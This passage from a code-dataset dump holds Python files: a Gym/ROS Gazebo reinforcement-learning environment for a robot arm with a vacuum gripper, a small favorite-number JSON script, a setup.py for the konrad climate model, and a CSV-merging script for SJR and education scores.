main()\n","sub_path":"SAT/sat_assignment_allowed_group.py","file_name":"sat_assignment_allowed_group.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"69341561","text":"#!/usr/bin/env python\n\n# IMPORT\nimport gym\nimport rospy\nimport numpy as np\nimport sys\nimport os\nimport yaml\nimport math\nimport time\nimport random\nimport datetime\nimport rospkg\nfrom gym import spaces\nfrom gym.utils import seeding\nfrom gym.envs.registration import register\nfrom transformations import quaternion_from_euler, euler_from_quaternion, quaternion_multiply, quaternion_conjugate\n\n# OTHER FILES\nimport environments.util_env as U\nimport environments.util_math as UMath\nfrom environments.gazebo_connection import GazeboConnection\nfrom environments.controllers_connection import ControllersConnection\nfrom environments.joint_publisher import JointPub\nfrom baselines import logger\n\n\n# MESSAGES/SERVICES\nfrom std_msgs.msg import Float64\nfrom std_msgs.msg import Bool\nfrom sensor_msgs.msg import JointState\nfrom gazebo_msgs.msg import ContactsState\nfrom sensor_msgs.msg import Image\nfrom gazebo_msgs.srv import GetModelState\nfrom gazebo_msgs.srv import SetModelState\nfrom gazebo_msgs.srv import GetLinkState\nfrom gazebo_msgs.srv import DeleteModel\nfrom gazebo_msgs.srv import SpawnModel\nfrom geometry_msgs.msg import Point, Quaternion, Vector3, Pose\nfrom gazebo_msgs.msg import ModelState\nfrom geometry_msgs.msg import Pose\nfrom geometry_msgs.msg import Point\nfrom openai_ros.msg import RLExperimentInfo\n\nfrom simulation.msg import VacuumGripperState\nfrom simulation.srv import VacuumGripperControl\n\n\n# DEFINE ENVIRONMENT CLASS\nclass PickbotEnv(gym.Env):\n\n def __init__(self, joint_increment_value=0.02, sim_time_factor=0.001, running_step=0.001, random_object=False,\n random_position=False, use_object_type=False, env_object_type='free_shapes', load_init_pos=False):\n \"\"\"\n initializing all the relevant variables and connections\n :param joint_increment_value: increment of the joints\n :param running_step: gazebo simulation time factor\n :param random_object: spawn random object in the simulation\n :param random_position: change object position in each reset\n :param use_object_type: assign IDs to objects and used them in the observation space\n :param env_object_type: object type for environment, free_shapes for boxes while others are related to use_case\n 
'door_handle', 'combox', ...\n \"\"\"\n\n # Assign Parameters\n self._joint_increment_value = joint_increment_value\n self.running_step = running_step\n self._random_object = random_object\n self._random_position = random_position\n self._use_object_type = use_object_type\n self._load_init_pos = load_init_pos\n\n # Assign MsgTypes\n self.joints_state = JointState()\n self.contact_1_state = ContactsState()\n self.contact_2_state = ContactsState()\n self.collision = Bool()\n self.camera_rgb_state = Image()\n self.camera_depth_state = Image()\n self.contact_1_force = Vector3()\n self.contact_2_force = Vector3()\n self.gripper_state = VacuumGripperState()\n\n self._list_of_observations = [\"elbow_joint_state\",\n \"shoulder_lift_joint_state\",\n \"shoulder_pan_joint_state\",\n \"wrist_1_joint_state\",\n \"wrist_2_joint_state\",\n \"wrist_3_joint_state\",\n \"vacuum_gripper_pos_x\",\n \"vacuum_gripper_pos_y\",\n \"vacuum_gripper_pos_z\",\n \"vacuum_gripper_ori_w\",\n \"vacuum_gripper_ori_x\",\n \"vacuum_gripper_ori_y\",\n \"vacuum_gripper_ori_z\",\n \"object_pos_x\",\n \"object_pos_y\",\n \"object_pos_z\",\n \"object_ori_w\",\n \"object_ori_x\",\n \"object_ori_y\",\n \"object_ori_z\",\n ]\n\n # if self._use_object_type:\n # self._list_of_observations.append(\"object_type\")\n\n # Establishes connection with simulator\n \"\"\"\n 1) Gazebo Connection \n 2) Controller Connection\n 3) Joint Publisher \n \"\"\"\n self.gazebo = GazeboConnection(sim_time_factor=sim_time_factor)\n self.controllers_object = ControllersConnection()\n self.pickbot_joint_publisher_object = JointPub()\n\n # Define Subscribers as Sensordata\n \"\"\"\n 1) /pickbot/joint_states\n 2) /gripper_contactsensor_1_state\n 3) /gripper_contactsensor_2_state\n 4) /gz_collisions\n 5) /pickbot/gripper/state\n 6) /camera_rgb/image_raw \n 7) /camera_depth/depth/image_raw\n \"\"\"\n rospy.Subscriber(\"/pickbot/joint_states\", JointState, self.joints_state_callback)\n rospy.Subscriber(\"/gripper_contactsensor_1_state\", ContactsState, self.contact_1_callback)\n rospy.Subscriber(\"/gripper_contactsensor_2_state\", ContactsState, self.contact_2_callback)\n rospy.Subscriber(\"/gz_collisions\", Bool, self.collision_callback)\n rospy.Subscriber(\"/pickbot/gripper/state\", VacuumGripperState, self.gripper_state_callback)\n # rospy.Subscriber(\"/camera_rgb/image_raw\", Image, self.camera_rgb_callback)\n # rospy.Subscriber(\"/camera_depth/depth/image_raw\", Image, self.camera_depth_callback)\n\n # Define Action and state Space and Reward Range\n \"\"\"\n Action Space: Box Space with 6 values.\n \n State Space: Box Space with 20 values. 
It is a numpy array with shape (20,)\n\n Reward Range: -infinity to infinity \n \"\"\"\n\n # Directly use joint_positions as action\n if self._joint_increment_value is None:\n high_action = (math.pi - 0.05) * np.ones(6)\n low_action = -high_action\n else: # Use joint_increments as action\n high_action = self._joint_increment_value * np.ones(6)\n low_action = -high_action\n\n self.action_space = spaces.Box(low_action, high_action)\n\n self.obs_dim = 20\n high = np.inf * np.ones(self.obs_dim)\n low = -high\n\n self.observation_space = spaces.Box(low, high)\n\n # if self._use_object_type:\n # high = np.append(high, 9)\n # low = np.append(low, 0)\n\n self.reward_range = (-np.inf, np.inf)\n\n self._seed()\n self.done_reward = 0\n\n # set up everything to publish the Episode Number and Episode Reward on a rostopic\n self.episode_num = 0\n self.accumulated_episode_reward = 0\n self.episode_steps = 0\n self.reward_pub = rospy.Publisher('/openai/reward', RLExperimentInfo, queue_size=1)\n self.reward_list = []\n self.episode_list = []\n self.step_list = []\n self.csv_name = logger.get_dir() + '/result_log'\n print(\"CSV NAME\")\n print(self.csv_name)\n self.csv_success_exp = logger.get_dir() + '/success_exp' + datetime.datetime.now().strftime('%Y-%m-%d_%Hh%Mmin') + '.csv'\n self.successful_attempts = 0\n\n # variable to store last observation\n self.old_obs = self.get_obs()\n\n # object name: name of the target object\n # object type: index of the object name in the object list\n # object list: pool of the available objects, have at least one entry\n self.object_name = ''\n self.object_type_str = ''\n self.object_type = 0\n self.object_list = U.get_target_object(env_object_type)\n print(\"object list {}\".format(self.object_list))\n self.object_initial_position = Pose(position=Point(x=-0.13, y=0.848, z=1.06),\n orientation=quaternion_from_euler(0.002567, 0.102, 1.563))\n\n # select first object, set object name and object type\n # if object is random, spawn random object\n # else get the first entry of object_list\n self.set_target_object([0, 0, 0, 0, 0, 0])\n\n # get maximum distance to the object to calculate reward, renewed in the reset function\n self.max_distance, _ = U.get_distance_gripper_to_object()\n # The closest distance during training\n self.min_distance = 999\n\n # get samples from reaching task\n if self._load_init_pos:\n import environments\n self.init_samples = U.load_samples_from_prev_task(os.path.dirname(environments.__file__) +\n \"/contacts_sample/door_sample/success_exp2019-05-21_11h41min.csv\")\n\n # Callback Functions for Subscribers to make topic values available each time the class is initialized\n def joints_state_callback(self, msg):\n self.joints_state = msg\n\n def contact_1_callback(self, msg):\n self.contact_1_state = msg.states\n\n def contact_2_callback(self, msg):\n self.contact_2_state = msg.states\n\n def collision_callback(self, msg):\n self.collision = msg.data\n\n def camera_rgb_callback(self, msg):\n self.camera_rgb_state = msg\n\n def camera_depth_callback(self, msg):\n self.camera_depth_state = msg\n\n def gripper_state_callback(self, msg):\n self.gripper_state = msg\n\n def _seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def reset(self):\n \"\"\"\n Reset The Robot to its initial Position and restart the Controllers\n\n 1) Change Gravity to 0 -> That arm doesnt fall\n 2) Turn Controllers off\n 3) Pause Simulation\n 4) Delete previous target object if randomly chosen object is set to True\n 4) Reset Simulation\n 
5) Set Model Pose to desired one\n 6) Unpause Simulation\n 7) Turn on Controllers\n 8) Restore Gravity\n 9) Get Observations and return current State\n 10) Check all Systems work\n 11) Spawn new target\n 12) Pause Simulation\n 13) Write initial Position into Yaml File\n 14) Create YAML Files for contact forces in order to get the average over 2 contacts\n 15) Create YAML Files for collision to make sure to see a collision due to high noise in topic\n 16) Unpause Simulation cause in next Step System must be running otherwise no data is seen by Subscribers\n 17) Publish Episode Reward and set accumulated reward back to 0 and iterate the Episode Number\n 18) Return State\n \"\"\"\n\n # print(\"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Reset %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\n self.gazebo.change_gravity(0, 0, 0)\n self.controllers_object.turn_off_controllers()\n # turn off the gripper\n # U.turn_off_gripper()\n self.gazebo.resetSim()\n self.gazebo.pauseSim()\n self.gazebo.resetSim()\n time.sleep(0.1)\n\n # turn on the gripper\n # U.turn_on_gripper()\n\n if self._load_init_pos:\n # load sample from previous training result\n sample_ep = random.choice(self.init_samples)\n print(\"Joints from samples: {}\".format(sample_ep[0:6]))\n # self.pickbot_joint_publisher_object.set_joints(sample_ep[0:6])\n self.set_target_object(sample_ep[-6:])\n else:\n self.pickbot_joint_publisher_object.set_joints()\n vg_geo = U.get_link_state(\"vacuum_gripper_link\")\n to_geo = U.get_link_state(\"target\")\n orientation_error = quaternion_multiply(vg_geo[3:], quaternion_conjugate(to_geo[3:]))\n # print(\"Orientation error {}\".format(orientation_error))\n box_pos = U.get_random_door_handle_pos() if self._random_position else self.object_initial_position\n U.change_object_position(self.object_name, box_pos)\n # Code above is hard-coded for door handle, modify later.\n # TO-DO: Modify reset wrt the object type as in the reach env\n\n self.gazebo.unpauseSim()\n self.controllers_object.turn_on_controllers()\n self.gazebo.change_gravity(0, 0, -9.81)\n self._check_all_systems_ready()\n\n # last_position = [1.5, -1.2, 1.4, -1.87, -1.57, 0]\n # last_position = [0, 0, 0, 0, 0, 0]\n # with open('last_position.yml', 'w') as yaml_file:\n # yaml.dump(last_position, yaml_file, default_flow_style=False)\n # with open('contact_1_force.yml', 'w') as yaml_file:\n # yaml.dump(0.0, yaml_file, default_flow_style=False)\n # with open('contact_2_force.yml', 'w') as yaml_file:\n # yaml.dump(0.0, yaml_file, default_flow_style=False)\n with open('collision.yml', 'w') as yaml_file:\n yaml.dump(False, yaml_file, default_flow_style=False)\n observation = self.get_obs()\n # print(\"current joints {}\".format(observation[:6]))\n # get maximum distance to the object to calculate reward\n # self.max_distance, _ = U.get_distance_gripper_to_object()\n # self.min_distance = self.max_distance\n self.gazebo.pauseSim()\n state = U.get_state(observation)\n self._update_episode()\n self.gazebo.unpauseSim()\n return state\n\n def step(self, action):\n \"\"\"\n Given the action selected by the learning algorithm,\n we perform the corresponding movement of the robot\n return: the state of the robot, the corresponding reward for the step and if its done(terminal State)\n\n 1) read last published joint from YAML\n 2) define ne joints acording to chosen action\n 3) Write joint position into YAML to save last published joints for next step\n 4) Unpause, Move to that pos for defined time, Pause\n 5) Get Observations and pause Simulation\n 6) Convert Observations into State\n 
7) Unpause Simulation check if its done, calculate done_reward and pause Simulation again\n 8) Calculate reward based on Observatin and done_reward\n 9) Unpause that topics can be received in next step\n 10) Return State, Reward, Done\n \"\"\"\n\n self.old_obs = self.get_obs()\n\n print(\"====================================================================\")\n # print(\"action: {}\".format(action))\n\n # 1) read last_position out of YAML File\n last_position = self.old_obs[:6]\n # with open(\"last_position.yml\", 'r') as stream:\n # try:\n # last_position = (yaml.load(stream, Loader=yaml.Loader))\n # except yaml.YAMLError as exc:\n # print(exc)\n # 2) get the new joint positions according to chosen action\n if self._joint_increment_value is None:\n next_action_position = action\n else:\n next_action_position = self.get_action_to_position(np.clip(action, -self._joint_increment_value, self._joint_increment_value),\n last_position)\n print(\"next action position: {}\".format(np.around(next_action_position, decimals=3)))\n\n # 3) write last_position into YAML File\n # with open('last_position.yml', 'w') as yaml_file:\n # yaml.dump(next_action_position, yaml_file, default_flow_style=False)\n\n # 4) unpause, move to position for certain time\n self.gazebo.unpauseSim()\n self.pickbot_joint_publisher_object.move_joints(next_action_position)\n # time.sleep(self.running_step)\n\n # Busy waiting until all the joints reach the next_action_position (first the third joints are reversed)\n start_ros_time = rospy.Time.now()\n while True:\n # Check collision:\n invalid_collision = self.get_collisions()\n if invalid_collision:\n print(\">>>>>>>>>> Collision: RESET <<<<<<<<<<<<<<<\")\n observation = self.get_obs()\n print(\"joints after reset collision : {} \".format(observation[:6]))\n\n # calculate reward immediately\n distance_error = observation[6:9] - observation[13:16]\n orientation_error = quaternion_multiply(observation[9:13], quaternion_conjugate(observation[16:]))\n\n rewardDist = UMath.rmseFunc(distance_error)\n rewardOrientation = 2 * np.arccos(abs(orientation_error[0]))\n\n reward = UMath.computeReward(rewardDist, rewardOrientation, invalid_collision)\n print(\"Reward this step after colliding {}\".format(reward))\n self.accumulated_episode_reward += reward\n return U.get_state(observation), reward, True, {}\n\n elapsed_time = rospy.Time.now() - start_ros_time\n if np.isclose(next_action_position, self.joints_state.position, rtol=0.0, atol=0.01).all():\n break\n elif elapsed_time > rospy.Duration(2): # time out\n print(\"TIME OUT, joints haven't reach positions\")\n break\n\n # 5) Get Observations and pause Simulation\n observation = self.get_obs()\n print(\"Observation in the step: {}\".format(np.around(observation[:6], decimals=3)))\n print(\"Joints in the step: {}\".format(np.around(self.joints_state.position, decimals=3)))\n # if observation[0] < self.min_distance:\n # self.min_distance = observation[0]\n self.gazebo.pauseSim()\n\n # 6) Convert Observations into state\n state = U.get_state(observation)\n\n # U.get_obj_orient()\n\n # 7) Unpause Simulation check if its done, calculate done_reward\n self.gazebo.unpauseSim()\n done, done_reward, invalid_collision = self.is_done(observation, last_position)\n self.gazebo.pauseSim()\n\n # 8) Calculate reward based on Observation and done_reward and update the accumulated Episode Reward\n # reward = self.compute_reward(observation, done_reward, invalid_contact)\n # reward = UMath.compute_reward_orient(observation, done_reward, invalid_contact)\n\n 
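# Reward terms: distance_error is the offset between the vacuum gripper\n        # position (observation[6:9]) and the object position (observation[13:16]);\n        # orientation_error is the relative quaternion between gripper and object,\n        # whose scalar part w gives the residual rotation angle as 2*arccos(|w|).\n        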
distance_error = observation[6:9] - observation[13:16]\n orientation_error = quaternion_multiply(observation[9:13], quaternion_conjugate(observation[16:]))\n\n rewardDist = UMath.rmseFunc(distance_error)\n rewardOrientation = 2 * np.arccos(abs(orientation_error[0]))\n\n reward = UMath.computeReward(rewardDist, rewardOrientation, invalid_collision) + done_reward\n print(\"Reward this step {}\".format(reward))\n\n self.accumulated_episode_reward += reward\n\n # 9) Unpause that topics can be received in next step\n self.gazebo.unpauseSim()\n\n self.episode_steps += 1\n # 10) Return State, Reward, Done\n return state, reward, done, {}\n\n def _check_all_systems_ready(self):\n \"\"\"\n Checks that all subscribers for sensortopics are working\n\n 1) /pickbot/joint_states\n 2) /gripper_contactsensor_1_state\n 3) /gripper_contactsensor_2_state\n 7) Collisions\n\n not used so far\n 4) /camera_rgb/image_raw\n 5) /camera_depth/depth/image_raw\n\n \"\"\"\n self.check_joint_states()\n self.check_contact_1()\n self.check_contact_2()\n self.check_collision()\n # self.check_rgb_camera()\n # self.check_rgbd_camera()\n # self.check_gripper_state()\n rospy.logdebug(\"ALL SYSTEMS READY\")\n\n def check_joint_states(self):\n joint_states_msg = None\n while joint_states_msg is None and not rospy.is_shutdown():\n try:\n joint_states_msg = rospy.wait_for_message(\"/pickbot/joint_states\", JointState, timeout=0.1)\n self.joints_state = joint_states_msg\n rospy.logdebug(\"Current joint_states READY\")\n except Exception as e:\n rospy.logdebug(\"Current joint_states not ready yet, retrying==>\" + str(e))\n print(\"EXCEPTION: Joint States not ready yet, retrying.\")\n\n def check_contact_1(self):\n contact_1_states_msg = None\n while contact_1_states_msg is None and not rospy.is_shutdown():\n try:\n contact_1_states_msg = rospy.wait_for_message(\"/gripper_contactsensor_1_state\", ContactsState,\n timeout=0.1)\n self.contact_1_state = contact_1_states_msg.states\n rospy.logdebug(\"Contactsensor 1 READY\")\n except Exception as e:\n rospy.logdebug(\"Contactsensor 1 not ready yet, retrying==>\" + str(e))\n print(\"EXCEPTION: Contactsensor 1 not ready yet, retrying.\")\n\n def check_contact_2(self):\n contact_2_states_msg = None\n while contact_2_states_msg is None and not rospy.is_shutdown():\n try:\n contact_2_states_msg = rospy.wait_for_message(\"/gripper_contactsensor_2_state\", ContactsState,\n timeout=0.1)\n self.contact_2_state = contact_2_states_msg.states\n rospy.logdebug(\"Contactsensor 2 READY\")\n except Exception as e:\n rospy.logdebug(\"Contactsensor 2 not ready yet, retrying==>\" + str(e))\n print(\"EXCEPTION: Contactsensor 2 not ready yet, retrying.\")\n\n def check_collision(self):\n collision_msg = None\n while collision_msg is None and not rospy.is_shutdown():\n try:\n collision_msg = rospy.wait_for_message(\"/gz_collisions\", Bool, timeout=0.1)\n self.collision = collision_msg.data\n rospy.logdebug(\"collision READY\")\n except Exception as e:\n rospy.logdebug(\"EXCEPTION: Collision not ready yet, retrying==>\" + str(e))\n\n def check_rgb_camera(self):\n camera_rgb_states_msg = None\n while camera_rgb_states_msg is None and not rospy.is_shutdown():\n try:\n camera_rgb_states_msg = rospy.wait_for_message(\"/camera_rgb/image_raw\", Image, timeout=0.1)\n self.camera_rgb_state = camera_rgb_states_msg\n rospy.logdebug(\"rgb_image READY\")\n except Exception as e:\n rospy.logdebug(\"EXCEPTION: rgb_image not ready yet, retrying==>\" + str(e))\n\n def check_rgbd_camera(self):\n camera_depth_states_msg = 
None\n while camera_depth_states_msg is None and not rospy.is_shutdown():\n try:\n camera_depth_states_msg = rospy.wait_for_message(\"/camera_depth/depth/image_raw\", Image, timeout=0.1)\n self.camera_depth_state = camera_depth_states_msg\n rospy.logdebug(\"rgbd_image READY\")\n except Exception as e:\n rospy.logdebug(\"EXCEPTION: rgbd_image not ready yet, retrying==>\" + str(e))\n\n def check_gripper_state(self):\n gripper_state_msg = None\n while gripper_state_msg is None and not rospy.is_shutdown():\n try:\n gripper_state_msg = rospy.wait_for_message(\"/pickbot/gripper/state\", VacuumGripperState, timeout=0.1)\n self.gripper_state = gripper_state_msg\n rospy.logdebug(\"gripper_state READY\")\n except Exception as e:\n rospy.logdebug(\"EXCEPTION: gripper_state not ready yet, retrying==>\" + str(e))\n\n # Set target object\n # randomize: spawn object randomly from the object pool. If false, object will be the first entry of the object list\n # random_position: spawn object with random position\n def set_target_object(self, position):\n self.object_name = self.object_list[0][\"name\"]\n self.object_type_str = self.object_list[0][\"type\"]\n self.object_type = 0\n\n box_pos = Pose(position=Point(x=position[0], y=position[1], z=position[2]),\n orientation=quaternion_from_euler(position[3], position[4], position[5]))\n\n U.change_object_position(self.object_name, box_pos)\n print(\"Current target: \", self.object_name)\n\n def get_action_to_position(self, action, last_position):\n \"\"\"\n Take the last published joint and increment/decrement one joint according to action chosen\n :param action: Integer that goes from 0 to 11, because we have 12 actions.\n :param last_position: array of 6 value\n :return: list with all joint positions according to chosen action\n \"\"\"\n\n action_position = np.asarray(last_position) + action\n # clip action that is going to be published to make sure to avoid losing control of controllers\n x = np.clip(action_position, -2.9, 2.9)\n\n return x.tolist()\n\n def get_obs(self):\n \"\"\"\n Returns the state of the robot needed for Algorithm to learn\n The state will be defined by a List (later converted to numpy array) of the:\n\n self._list_of_observations = [\"elbow_joint_state\",\n \"shoulder_lift_joint_state\",\n \"shoulder_pan_joint_state\",\n \"wrist_1_joint_state\",\n \"wrist_2_joint_state\",\n \"wrist_3_joint_state\",\n \"vacuum_gripper_pos_x\",\n \"vacuum_gripper_pos_y\",\n \"vacuum_gripper_pos_z\",\n \"vacuum_gripper_ori_w\",\n \"vacuum_gripper_ori_x\",\n \"vacuum_gripper_ori_y\",\n \"vacuum_gripper_ori_z\",\n \"object_pos_x\",\n \"object_pos_y\",\n \"object_pos_z\",\n \"object_ori_w\",\n \"object_ori_x\",\n \"object_ori_y\",\n \"object_ori_z\",\n ]\n\n :return: observation\n \"\"\"\n\n # Get Joints Data out of Subscriber\n joints_state = self.joints_state.position\n\n for joint in self.joints_state.position:\n if joint > math.pi or joint < -math.pi:\n print(self.joints_state.name)\n print(self.joints_state.position)\n sys.exit(\"Joint exceeds limit\")\n\n vacuum_gripper_geometry = U.get_link_state(\"vacuum_gripper_link\")\n\n target_geometry = U.get_link_state(\"target\")\n\n # Concatenate the information that defines the robot state\n state = np.r_[np.reshape(joints_state, -1),\n np.reshape(vacuum_gripper_geometry, -1),\n np.reshape(target_geometry, -1)]\n\n return state\n\n def get_contact_force_1(self):\n \"\"\"\n Get Contact Force of contact sensor 1\n Takes average over 2 contacts so the chances are higher that both sensors say there is contact the 
same time due to sensor noise\n :returns force value\n \"\"\"\n\n # get Force out of contact_1_state\n if not self.contact_1_state:\n contact1_force = 0.0\n else:\n for state in self.contact_1_state:\n self.contact_1_force = state.total_wrench.force\n contact1_force_np = np.array((self.contact_1_force.x, self.contact_1_force.y, self.contact_1_force.z))\n force_magnitude_1 = np.linalg.norm(contact1_force_np)\n contact1_force = force_magnitude_1\n\n # read last contact force 1 value out of yaml\n with open(\"contact_1_force.yml\", 'r') as stream:\n try:\n last_contact_1_force = (yaml.load(stream, Loader=yaml.Loader))\n except yaml.YAMLError as exc:\n print(exc)\n # write new contact_1_force value in yaml\n with open('contact_1_force.yml', 'w') as yaml_file:\n yaml.dump(contact1_force, yaml_file, default_flow_style=False)\n # calculate average force\n average_contact_1_force = (last_contact_1_force + contact1_force) / 2\n\n return average_contact_1_force\n\n def get_contact_force_2(self):\n \"\"\"\n Get Contact Force of contact sensor 2\n Takes average over 2 contacts so the chances are higher that both sensors say there is contact the same time due to sensor noise\n :returns force value\n \"\"\"\n\n # get Force out of contact_2_state\n if not self.contact_2_state:\n contact2_force = 0.0\n else:\n for state in self.contact_2_state:\n self.contact_2_force = state.total_wrench.force\n contact2_force_np = np.array((self.contact_2_force.x, self.contact_2_force.y, self.contact_2_force.z))\n force_magnitude_2 = np.linalg.norm(contact2_force_np)\n contact2_force = force_magnitude_2\n\n # read last contact_2_force value out of yaml\n with open(\"contact_2_force.yml\", 'r') as stream:\n try:\n last_contact_2_force = (yaml.load(stream, Loader=yaml.Loader))\n except yaml.YAMLError as exc:\n print(exc)\n # write new contact force 2 value in yaml\n with open('contact_2_force.yml', 'w') as yaml_file:\n yaml.dump(contact2_force, yaml_file, default_flow_style=False)\n # calculate average force\n average_contact_2_force = (last_contact_2_force + contact2_force) / 2\n\n return average_contact_2_force\n\n def get_collisions(self):\n \"\"\"\n Checks all the collisions by listening to rostopic /gz_collisions wich is republishing the gazebo topic (gz topic -e /gazebo/default/physics/contacts).\n The Publisher is started in a different node out of the simulation launch file.\n Stores last value yaml file and if one of the two values is showing a invalid collision it returns a invalid collision.\n This is to make shure seeing collisions due to high sensor noise and publish rate.\n\n If one of the 2 Messages is True it returns True.\n returns:\n False: if no contacts or just valid ones -> Box/Shelf, Wrist3/Box, VacuumGripper/Box\n True: if any other contact occurs which is invalid\n \"\"\"\n\n # read last contact_2_force value out of yaml\n with open(\"collision.yml\", 'r') as stream:\n try:\n last_collision = (yaml.load(stream, Loader=yaml.Loader))\n except yaml.YAMLError as exc:\n print(exc)\n # write new contact force 2 value in yaml\n with open('collision.yml', 'w') as yaml_file:\n yaml.dump(self.collision, yaml_file, default_flow_style=False)\n\n # Check if last_collision or self.collision is True. 
IF one s true return True else False\n if self.collision == True or last_collision == True:\n return True\n else:\n return False\n\n def is_done(self, observations, last_position):\n \"\"\"Checks if episode is done based on observations given.\n\n Done when:\n -Successfully reached goal: Contact with both contact sensors and contact is a valid one(Wrist3 or/and Vacuum Gripper with unit_box)\n -Crashing with itself, shelf, base\n -Joints are going into limits set\n \"\"\"\n\n done = False\n done_reward = 0\n reward_reached_goal = 1000\n reward_crashing = -2000\n\n # Check if there are invalid collisions\n invalid_collision = self.get_collisions()\n\n # Successfully reached_goal: orientation of the end-effector and target is less than threshold also\n # distance is less than threshold\n distance_gripper_to_target = np.linalg.norm(observations[6:9] - observations[13:16])\n orientation_error = quaternion_multiply(observations[9:13], quaternion_conjugate(observations[16:]))\n # print(\"check distance {} and orientation err {} \".format(distance_gripper_to_target, orientation_error))\n\n if distance_gripper_to_target < 0.05 and np.abs(orientation_error[0]) < 0.1:\n done = True\n print(\"Success! Distance {} and orientation err {} \".format(distance_gripper_to_target, orientation_error[0]))\n done_reward = reward_reached_goal\n\n # Successfully reached goal: Contact with both contact sensors and there is no invalid contact\n # if observations[7] != 0 and observations[8] != 0 and not invalid_collision:\n # done = True\n # print('>>>>>> Success!')\n # done_reward = reward_reached_goal\n # # save state in csv file\n # U.append_to_csv(self.csv_success_exp, observations)\n # self.successful_attempts += 1\n # print(\"Successful contact so far: {} attempts\".format(self.successful_attempts))\n\n # Crashing with itself, shelf, base\n if invalid_collision:\n done = True\n print('>>>>>>>>>>>>>>>>>>>> crashing')\n # done_reward = reward_crashing\n\n return done, done_reward, invalid_collision\n\n def load_position(self):\n pass\n\n def _update_episode(self):\n \"\"\"\n Publishes the accumulated reward of the episode and\n increases the episode number by one.\n :return:\n \"\"\"\n if self.episode_num > 0:\n self._publish_reward_topic(\n self.accumulated_episode_reward,\n self.episode_steps,\n self.episode_num\n )\n\n self.episode_num += 1\n self.accumulated_episode_reward = 0\n self.episode_steps = 0\n\n def _publish_reward_topic(self, reward, steps, episode_number=1):\n \"\"\"\n This function publishes the given reward in the reward topic for\n easy access from ROS infrastructure.\n :param reward:\n :param episode_number:\n :return:\n \"\"\"\n reward_msg = RLExperimentInfo()\n reward_msg.episode_number = episode_number\n reward_msg.episode_reward = reward\n self.reward_pub.publish(reward_msg)\n self.reward_list.append(reward)\n self.episode_list.append(episode_number)\n self.step_list.append(steps)\n list = str(reward) + \";\" + str(episode_number) + \";\" + str(steps) + \"\\n\"\n\n with open(self.csv_name + '.csv', 'a') as csv:\n csv.write(str(list))\n","sub_path":"environments/pickbot_lift_continuous.py","file_name":"pickbot_lift_continuous.py","file_ext":"py","file_size_in_byte":34342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"113670762","text":"import json\r\n\r\ndef getnumber():\r\n number = input(\"What's your favorite number? \")\r\n with open('favorite_number.json', 'w') as f:\r\n json.dump(number, f)\r\n print(\"Thanks! 
I'll remember that.\")\r\n\r\ndef favread():\r\n    try:\r\n        with open('favorite_number.json') as f:\r\n            number = json.load(f)\r\n        return number\r\n    except FileNotFoundError:\r\n        return None\r\n\r\ndef whatsmyfav():\r\n    number = favread()\r\n    if number:\r\n        print(\"I know your favorite number! It's\", number)\r\n    else:\r\n        getnumber()\r\n\r\nwhatsmyfav()","sub_path":"2-10-2019/Fav Number.py","file_name":"Fav Number.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"123287412","text":"# -*- coding: utf-8 -*-\nfrom os.path import (dirname, join)\nfrom setuptools import setup, find_packages\n\n\n__version__ = open(join(dirname(__file__), 'konrad', 'VERSION')).read().strip()\n\nwith open('README.md') as f:\n    long_description = f.read()\n\nsetup(\n    name='konrad',\n    author='The konrad developers',\n    version=__version__,\n    url='https://github.com/atmtools/konrad',\n    download_url='https://github.com/atmtools/konrad/tarball/v' + __version__,\n    packages=find_packages(),\n    license='MIT',\n    description='Implementation of a radiative-convective equilibrium model.',\n    long_description=long_description,\n    long_description_content_type='text/markdown',\n    classifiers=[\n        # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n        'Intended Audience :: Science/Research',\n        'License :: OSI Approved :: MIT License',\n        'Programming Language :: Python :: 3.6',\n        'Programming Language :: Python :: 3.7',\n        'Programming Language :: Python :: 3.8',\n    ],\n    python_requires='>=3.6',\n    include_package_data=True,\n    install_requires=[\n        'matplotlib>=2.0.0',\n        'netcdf4>=1.2.7',\n        'numpy>=1.16.0',\n        'scipy>=0.19.0',\n        'typhon>=0.7.0',\n        'xarray>=0.9.1',\n        'climt>=0.16.25',\n        'sympl>=0.4.0',\n    ],\n    extras_require={\n        'arts': [\n            'pyarts',\n        ],\n        'docs': [\n            'sphinx',\n            'sphinx_rtd_theme',\n        ],\n        'tests': [\n            'pytest',\n        ],\n    },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"136410695","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 7 14:51:41 2017\n\n@author: yuchenli\n\"\"\"\n\nimport pandas as pd\nSJR_weighted = pd.read_csv(\"/Users/yuchenli/Box Sync/Yuchen_project/\"\n                           \"Truven_rising_stars/SJR_education_clustering/\"\n                           \"600_SJR_weighted.csv\", sep = \",\", encoding = 'utf-8')\neducation = pd.read_csv(\"/Users/yuchenli/Box Sync/Yuchen_project/\"\n                        \"Truven_rising_stars/SJR_education_clustering/\"\n                        \"education_score.csv\", sep = \",\", encoding = 'utf-8')\n\n# Convert them to dictionaries\nSJR_dict = dict(zip(SJR_weighted.ID, SJR_weighted.score))\n\nimport csv\nwith open(\"/Users/yuchenli/Box Sync/Yuchen_project/Truven_rising_stars/\"\n          \"SJR_education_clustering/SJR_education.csv\", \"w\") as csvfile:\n    fieldnames = ['HBE_ID', \"Education_score\", \"SJR\", \"KOL\"]\n    writer = csv.DictWriter(csvfile, fieldnames = fieldnames)\n    writer.writeheader()\n    i = 0\n    for i in range(len(education)):\n        HBE_ID = education.loc[i,\"HBE_ID\"]\n        Education_score = education.loc[i, \"Education_score\"]\n        KOL = education.loc[i, \"KOL\"]\n        try:\n            SJR = SJR_dict[HBE_ID]\n            writer.writerow({'HBE_ID': HBE_ID, \"Education_score\": Education_score, \n                             \"SJR\": SJR, \"KOL\": KOL})\n            \n        except KeyError:\n            # this HBE_ID has no SJR score; skip the row\n            pass\n\n# Test: Temp_2972_1004 